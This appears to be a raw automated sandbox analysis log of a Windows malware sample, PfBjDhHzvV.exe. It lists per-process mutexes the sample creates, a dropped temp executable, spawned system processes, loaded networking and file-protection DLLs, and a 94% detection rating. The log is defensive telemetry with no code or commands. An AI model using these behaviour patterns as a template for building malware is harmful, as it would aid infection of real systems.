            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5292_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6516_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_6232_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6124_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4452_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_4972_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_632_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2948_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5116_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3888_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1788_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2440_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4844_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4348_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6228_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_968_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6640_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2856_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_356_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1064_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3740_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3396_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3784_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4040_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7292_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2656_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1460_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1456_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_748_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2248_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5512_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\shellexperiencehost.exeM_7984_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\textinputhost.exeM_6852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6768_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1636_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\registryM_92_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5480_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\wininit.exeM_488_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4692_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6336_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4244_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2096_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4256_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_860_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3536_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\sihost.exeM_3476_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3696_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2736_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3456_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6092_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3012_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\ctfmon.exeM_3852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4908_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1312_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1388_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1760_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5620_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1376_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2316_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7072_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5740_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7084_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5764_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4444_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\pfbjdhhzvv.exeM_7272_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_4224_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4548_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1952_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7028_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1976_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4132_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6444_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6880_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4540_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_5908_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4932_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2620_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3828_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5424_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4928_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3556_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1204_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_932_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2416_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\winstore.app.exeM_1868_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1804_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1436_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\explorer.exeM_4056_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6904_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_8080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\winlogon.exeM_556_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6984_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2344_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4432_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6552_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dashost.exeM_4492_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1188_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1520_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7384_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\memory compressionM_1608_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1992_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2536_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3032_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1736_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3092_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2460_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4288_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2404_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6644_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2432_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_772_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1096_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3300_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1020_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3364_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1044_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2636_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2612_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4480_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1400_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_704_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1476_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1872_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\sppsvc.exeM_7076_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\spoolsv.exeM_2216_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\smartscreen.exeM_5672_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\backgroundtaskhost.exeM_6176_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6748_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\services.exeM_624_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_6068_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4212_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5744_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2716_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5544_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\dwm.exeM_976_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5148_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5124_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1344_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1752_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_864_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5784_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_3596_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\sgrmbroker.exeM_2008_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Users\user~1\AppData\Local\Temp\xjjalq.exeJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile read: C:\Windows\system.iniJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: PfBjDhHzvV.exeReversingLabs: Detection: 94%
            Source: PfBjDhHzvV.exeString found in binary or memory: F-STOPW.
            Source: faawXJQQDELvfTymNiVz.exeString found in binary or memory: F-STOPW.
            Source: unknownProcess created: C:\Users\user\Desktop\PfBjDhHzvV.exe "C:\Users\user\Desktop\PfBjDhHzvV.exe"
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess created: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\dllhost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wpnclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: contentdeliverymanager.utilities.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cdp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsreg.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinui.pcshell.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wincorlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\RuntimeBroker.exeSection loaded: dxcore.dllJump to behavior
